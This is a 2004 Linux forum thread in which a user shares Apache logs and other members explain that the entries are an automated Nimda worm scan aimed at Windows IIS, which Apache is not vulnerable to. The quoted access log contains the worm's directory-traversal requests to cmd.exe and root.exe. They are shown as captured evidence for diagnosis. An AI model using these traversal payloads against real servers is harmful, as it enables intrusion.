LinuxQuestions.org
Download your favorite Linux distribution at LQ ISO.
Home Forums Tutorials Articles Register
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices


Reply
  Search this Thread
Old 04-13-2004, 01:17 AM   #1
Lleb_KCir
Senior Member
 
Registered: Nov 2003
Location: Orlando FL
Distribution: Debian
Posts: 1,765

Rep: Reputation: 45
apache logs please teach me how to read them


Quote:
c-24-2-175-163.client.comcast.net - - [12/Apr/2004:23:34:51 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 313 "-" "-"
c-24-2-175-163.client.comcast.net - - [12/Apr/2004:23:34:52 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
c-24-2-175-163.client.comcast.net - - [12/Apr/2004:23:34:52 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-"
c-24-2-175-163.client.comcast.net - - [12/Apr/2004:23:34:53 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-"
c-24-2-175-163.client.comcast.net - - [12/Apr/2004:23:34:53 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
c-24-2-175-163.client.comcast.net - - [12/Apr/2004:23:34:53 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 352 "-" "-"
c-24-2-175-163.client.comcast.net - - [12/Apr/2004:23:34:53 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 352 "-" "-"
c-24-2-175-163.client.comcast.net - - [12/Apr/2004:23:34:53 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 368 "-" "-"
c-24-2-175-163.client.comcast.net - - [12/Apr/2004:23:34:54 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334 "-" "-"
24.2.175.163 - - [12/Apr/2004:23:34:54 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334 "-" "-"
c-24-2-175-163.client.comcast.net - - [12/Apr/2004:23:34:54 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334 "-" "-"
c-24-2-175-163.client.comcast.net - - [12/Apr/2004:23:34:54 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334 "-" "-"
24.2.175.163 - - [12/Apr/2004:23:34:55 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 325 "-" "-"
24.2.175.163 - - [12/Apr/2004:23:34:55 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 325 "-" "-"
c-24-2-175-163.client.comcast.net - - [12/Apr/2004:23:34:55 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
c-24-2-175-163.client.comcast.net - - [12/Apr/2004:23:34:55 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
l
that is a portion of my access log and here is something from my error logs.

Quote:
[Mon Apr 12 00:50:37 2004] [error] [client 24.12.60.185] File does not exist: /var/www/html/scripts
[Mon Apr 12 00:50:37 2004] [error] [client 24.12.60.185] File does not exist: /var/www/html/MSADC
[Mon Apr 12 00:50:38 2004] [error] [client 24.12.60.185] File does not exist: /var/www/html/c
[Mon Apr 12 00:50:38 2004] [error] [client 24.12.60.185] File does not exist: /var/www/html/d
[Mon Apr 12 00:50:38 2004] [error] [client 24.12.60.185] File does not exist: /var/www/html/scripts
[Mon Apr 12 00:50:38 2004] [error] [client 24.12.60.185] File does not exist: /var/www/html/_vti_bin
[Mon Apr 12 00:50:39 2004] [error] [client 24.12.60.185] File does not exist: /var/www/html/_mem_bin
[Mon Apr 12 00:50:39 2004] [error] [client 24.12.60.185] File does not exist: /var/www/html/msadc
[Mon Apr 12 00:50:39 2004] [error] [client 24.12.60.185] File does not exist: /var/www/html/scripts
[Mon Apr 12 00:50:40 2004] [error] [client 24.12.60.185] File does not exist: /var/www/html/scripts
[Mon Apr 12 00:50:40 2004] [error] [client 24.12.60.185] File does not exist: /var/www/html/scripts
[Mon Apr 12 00:50:41 2004] [error] [client 24.12.60.185] File does not exist: /var/www/html/scripts
[Mon Apr 12 00:50:41 2004] [error] [client 24.12.60.185] File does not exist: /var/www/html/scripts
[Mon Apr 12 13:51:38 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/scripts
[Mon Apr 12 13:51:38 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/MSADC
[Mon Apr 12 13:51:38 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/c
[Mon Apr 12 13:51:38 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/d
[Mon Apr 12 13:51:39 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/scripts
[Mon Apr 12 13:51:39 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/_vti_bin
[Mon Apr 12 13:51:40 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/_mem_bin
[Mon Apr 12 13:51:40 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/msadc
[Mon Apr 12 13:51:40 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/scripts
[Mon Apr 12 13:51:40 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/scripts
[Mon Apr 12 13:51:41 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/scripts
[Mon Apr 12 13:51:41 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/scripts
[Mon Apr 12 13:51:41 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/scripts
[Mon Apr 12 19:50:13 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/scripts
[Mon Apr 12 19:50:14 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/MSADC
[Mon Apr 12 19:50:14 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/c
[Mon Apr 12 19:50:14 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/d
[Mon Apr 12 19:50:15 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/scripts
[Mon Apr 12 19:50:15 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/_vti_bin
[Mon Apr 12 19:50:15 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/_mem_bin
[Mon Apr 12 19:50:15 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/msadc
[Mon Apr 12 19:50:16 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/scripts
[Mon Apr 12 19:50:16 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/scripts
[Mon Apr 12 19:50:16 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/scripts
[Mon Apr 12 19:50:17 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/scripts
[Mon Apr 12 19:50:17 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/scripts
[Mon Apr 12 20:26:25 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/scripts
[Mon Apr 12 20:26:26 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/MSADC
[Mon Apr 12 20:26:26 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/c
[Mon Apr 12 20:26:26 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/d
[Mon Apr 12 20:26:26 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/scripts
[Mon Apr 12 20:26:27 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/_vti_bin
[Mon Apr 12 20:26:27 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/_mem_bin
[Mon Apr 12 20:26:27 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/msadc
[Mon Apr 12 20:26:27 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/scripts
[Mon Apr 12 20:26:28 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/scripts
[Mon Apr 12 20:26:28 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/scripts
[Mon Apr 12 20:26:29 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/scripts
[Mon Apr 12 20:26:29 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/scripts
[Mon Apr 12 21:08:05 2004] [error] [client 216.15.41.101] File does not exist: /var/www/html/scripts
[Mon Apr 12 21:41:21 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/scripts
[Mon Apr 12 21:41:21 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/MSADC
[Mon Apr 12 21:41:22 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/c
[Mon Apr 12 21:41:22 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/d
[Mon Apr 12 21:41:22 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/scripts
[Mon Apr 12 21:41:22 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/_vti_bin
[Mon Apr 12 21:41:23 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/_mem_bin
[Mon Apr 12 21:41:23 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/msadc
[Mon Apr 12 21:41:23 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/scripts
[Mon Apr 12 21:41:23 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/scripts
[Mon Apr 12 21:41:24 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/scripts
[Mon Apr 12 21:41:24 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/scripts
[Mon Apr 12 21:41:25 2004] [error] [client 24.27.174.54] File does not exist: /var/www/html/scripts
[Mon Apr 12 23:21:58 2004] [error] [client 127.0.0.1] File does not exist: /var/www/html/favicon.ico, referer: http://127.0.0.1/
[Mon Apr 12 23:34:52 2004] [error] [client 24.2.175.163] File does not exist: /var/www/html/scripts
[Mon Apr 12 23:34:52 2004] [error] [client 24.2.175.163] File does not exist: /var/www/html/MSADC
[Mon Apr 12 23:34:52 2004] [error] [client 24.2.175.163] File does not exist: /var/www/html/c
[Mon Apr 12 23:34:53 2004] [error] [client 24.2.175.163] File does not exist: /var/www/html/d
[Mon Apr 12 23:34:53 2004] [error] [client 24.2.175.163] File does not exist: /var/www/html/scripts
[Mon Apr 12 23:34:53 2004] [error] [client 24.2.175.163] File does not exist: /var/www/html/_vti_bin
[Mon Apr 12 23:34:53 2004] [error] [client 24.2.175.163] File does not exist: /var/www/html/_mem_bin
[Mon Apr 12 23:34:54 2004] [error] [client 24.2.175.163] File does not exist: /var/www/html/msadc
[Mon Apr 12 23:34:54 2004] [error] [client 24.2.175.163] File does not exist: /var/www/html/scripts
[Mon Apr 12 23:34:54 2004] [error] [client 24.2.175.163] File does not exist: /var/www/html/scripts
[Mon Apr 12 23:34:54 2004] [error] [client 24.2.175.163] File does not exist: /var/www/html/scripts
[Mon Apr 12 23:34:55 2004] [error] [client 24.2.175.163] File does not exist: /var/www/html/scripts
[Mon Apr 12 23:34:55 2004] [error] [client 24.2.175.163] File does not exist: /var/www/html/scripts

is someone trying to access something i dont have and need to think about locking down, and if so, how would i go about locking it down?
 
Old 04-13-2004, 01:53 AM   #2
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 69
Apache log format can vary, but looks like yours follows the standard Redhat Apache format:
Remotehost -- Data&Time -- First_line_of_Request -- HTTP_Status_Code -- Content_Length_of_Reply -- Referer -- User_Agent

As far as what you are seeing in the log itself, that looks like a Nimda scan. Nimda is fairly common worm that packages a number of windows exploits in an automated scan in an attempt to infect unpatched windows boxes (btw, those vulnerabilities are so old that it is ridiculous and the admin of that machine should be summarily shot). Apache is not vulnerable to any of those exploits uased by Nimda. In general, if you see the string cmd.exe it is usually a good tip off that it is a windows exploit. You can read more about Nimda here:

http://www.cert.org/advisories/CA-2001-26.html
 
Old 04-13-2004, 11:23 AM   #3
Lleb_KCir
Senior Member
 
Registered: Nov 2003
Location: Orlando FL
Distribution: Debian
Posts: 1,765

Original Poster
Rep: Reputation: 45
thank you for the help. any clue what the /var/www/html/favicon.ico is refering to?

i have double checked all of my html, and my entire /var/www/html dircotry and that .ico file picture or what ever it is does not exsist, and why would a browser be looking for something that is not in the html code to tell it to look for?
 
Old 04-13-2004, 12:05 PM   #4
Inexactitude
Member
 
Registered: Oct 2003
Distribution: Slackware 12.2, Ubuntu 9.04
Posts: 477

Rep: Reputation: 30
That's probably some other kind automated scan, I think I've seen that one before too. A lot of what shows up in the logs is windows exploits (I still see code red once and a while), so you shouldn't get too worried. Don't get lax though.
 
Old 04-13-2004, 02:05 PM   #5
Lleb_KCir
Senior Member
 
Registered: Nov 2003
Location: Orlando FL
Distribution: Debian
Posts: 1,765

Original Poster
Rep: Reputation: 45
just found it odd coming from my local system running rh9 using opera as my browser.
 
Old 04-13-2004, 04:55 PM   #6
Jim.DiGriz
LQ Newbie
 
Registered: Apr 2004
Location: Tulsa, Oklahoma
Distribution: Slackware 9.1,RedHat 9, Fedora Core 1, Fedora Core 2, Redhat Enterprise Linux AS v. 3, Mac OS 10.3.3
Posts: 16

Rep: Reputation: 0
The favicon.ico thing is a normal request from most modern browsers. If you access this page with Mozilla Firefox 0.8 for instance and see the little Tux up next to the http://........ that's this sites favicon.ico. It doesn't have to be in the page anywhere for the browser to request it, they just do all by themselves. So that log entry was probably just your own Opera doing its thing.
 
Old 04-13-2004, 05:40 PM   #7
Lleb_KCir
Senior Member
 
Registered: Nov 2003
Location: Orlando FL
Distribution: Debian
Posts: 1,765

Original Poster
Rep: Reputation: 45
ok, but what is it? what Tux?
 
Old 04-14-2004, 11:24 AM   #8
Jim.DiGriz
LQ Newbie
 
Registered: Apr 2004
Location: Tulsa, Oklahoma
Distribution: Slackware 9.1,RedHat 9, Fedora Core 1, Fedora Core 2, Redhat Enterprise Linux AS v. 3, Mac OS 10.3.3
Posts: 16

Rep: Reputation: 0
In my browser, and I assume your Opera too if you point it here, up in the address bar, to the left of http://www.linuxquestions.org/........ etc. there's a little tiny picture of Tux the linux penguin. That's the favicon.ico loaded from this site.
 
Old 04-14-2004, 03:23 PM   #9
Lleb_KCir
Senior Member
 
Registered: Nov 2003
Location: Orlando FL
Distribution: Debian
Posts: 1,765

Original Poster
Rep: Reputation: 45
got ya. now i get it. ok kewl. thanks.
 
Old 04-15-2004, 12:04 AM   #10
czarherr
Member
 
Registered: Sep 2003
Location: Suwon, Korea
Distribution: Slackware 14
Posts: 288

Rep: Reputation: 32
that first one is a Nimda exploit designed to work in windows
 
Old 04-15-2004, 12:34 AM   #11
Lleb_KCir
Senior Member
 
Registered: Nov 2003
Location: Orlando FL
Distribution: Debian
Posts: 1,765

Original Poster
Rep: Reputation: 45
you would of figured everyone would of patched their systems by now and that would of stoped travling the world. oh well. stupid ppl = more virus to spread around.
 
Old 04-15-2004, 02:54 PM   #12
Inexactitude
Member
 
Registered: Oct 2003
Distribution: Slackware 12.2, Ubuntu 9.04
Posts: 477

Rep: Reputation: 30
I know what you're saying. I even see code red sometimes, and that thing is ancient. People who have broadband connections like cable and don't patch their machines pose a pretty serious problem.
 
Old 04-15-2004, 04:50 PM   #13
czarherr
Member
 
Registered: Sep 2003
Location: Suwon, Korea
Distribution: Slackware 14
Posts: 288

Rep: Reputation: 32
well, consider this though. Some companies have thousands of systems running, many of them breaking down all the time. They have to be reloaded, patched, hardened, and generally reconfigured by techs. many techs are lazy, or careless, and dont bother or know to install the patches. also, thousands of windows home users dont even know what code red or nimda, or even what a worm is, and probably dont even know how to use windows update to patch it. that is where the problem is
 
Old 04-15-2004, 07:30 PM   #14
Lleb_KCir
Senior Member
 
Registered: Nov 2003
Location: Orlando FL
Distribution: Debian
Posts: 1,765

Original Poster
Rep: Reputation: 45
Quote:
Originally posted by czarherr
well, consider this though. Some companies have thousands of systems running, many of them breaking down all the time. They have to be reloaded, patched, hardened, and generally reconfigured by techs. many techs are lazy, or careless, and dont bother or know to install the patches. also, thousands of windows home users dont even know what code red or nimda, or even what a worm is, and probably dont even know how to use windows update to patch it. that is where the problem is
and that is so true yet so sad.
 
Old 04-15-2004, 10:46 PM   #15
Inexactitude
Member
 
Registered: Oct 2003
Distribution: Slackware 12.2, Ubuntu 9.04
Posts: 477

Rep: Reputation: 30
Well, that was exactly what I was getting at. Most of the ips that launch these attacks are from ranges that are often used by broadband services, like road runner and comcast, and if you don't patch these boxes they almost certainly will be doing something bad. You're right, if I were to ask people what nimda was, 9 out of 10 wouldn't know what I'm talking about. Now a lot of people complain about the new windows initiative to have the operating system automatically patch itself, but to tell you the truth, I think it's a good idea. Most simply refuse to patch them, so I think they should automatically be patched, without any user input. Someone I know is running a windows box without av and a firewall, downloads crap on kazaa, and then she tells me that she's never been hacked or got a virus. I'm sure. If nobody cares enough to patch their boxes, well I guess Bill is going to have to do it for them.
 
  


Reply



Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
how do i read logs from Freebsd?? human *BSD 2 03-01-2005 06:19 PM
how to read mail logs? djfranknitti Linux - Newbie 2 09-21-2004 08:41 AM
how to read fwlogwatch logs rosscopeeko Mandriva 1 04-20-2004 01:22 AM
Gui wont start cant read logs what to do shaneblyth Linux - Newbie 1 12-03-2003 01:08 AM
Apache logs - ???Linux logs??? mylo2003 Linux - General 3 08-07-2003 04:49 PM

LinuxQuestions.org > Forums > Linux Forums > Linux - Security

All times are GMT -5. The time now is 09:07 AM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Open Source Consulting | Domain Registration